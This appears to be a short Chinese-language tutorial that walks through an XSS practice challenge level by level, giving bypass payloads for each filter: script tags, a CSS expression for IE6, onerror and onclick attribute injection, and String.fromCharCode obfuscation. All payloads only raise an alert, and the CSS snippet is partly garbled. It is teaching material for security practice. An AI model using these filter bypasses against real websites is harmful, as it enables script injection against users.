無安全性方面的限制,直接使用
<script>alert(/xss/);</script>
#限制條件:只能使用CSS,不允許使用html標籤
我們知道利用expression可以用來建構XSS,但只能在IE下面測試,所以下面的測試請在IE6中執行。
body {
black;
xss:alert(/xss/));/*IE6下测试*/
}限制條件:對HTML進行了轉義,Image標籤可用。
測試輸入的字元會被插入到src位址中,那麼可以使用偽協定來繞過。
直接輸入
alert( /xss/);
或你也可以使用事件來繞過,注意閉合語句即可,如下:
1" onerror=alert(/xss/); var a="1
限制:使用了關鍵字過濾。
我測試了一下,大部分都過濾了,有部分未過濾,經過測試script/onerror過濾了,但是onclick未過濾,使用onclick事件繞過
<img src=# onclick=alert(/xss/);>
限制條件:使用addslashes對特徵字元進行了轉義
也就是說我們的XSS語句中不能出現單引號,雙引號等等特徵字元。
直接使用
<script>alert(/xss/);</script>
即可繞過
或使用String.fromCharCode方法,如下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
以上是xss的小測試是怎麼進行的的詳細內容。更多資訊請關注PHP中文網其他相關文章!
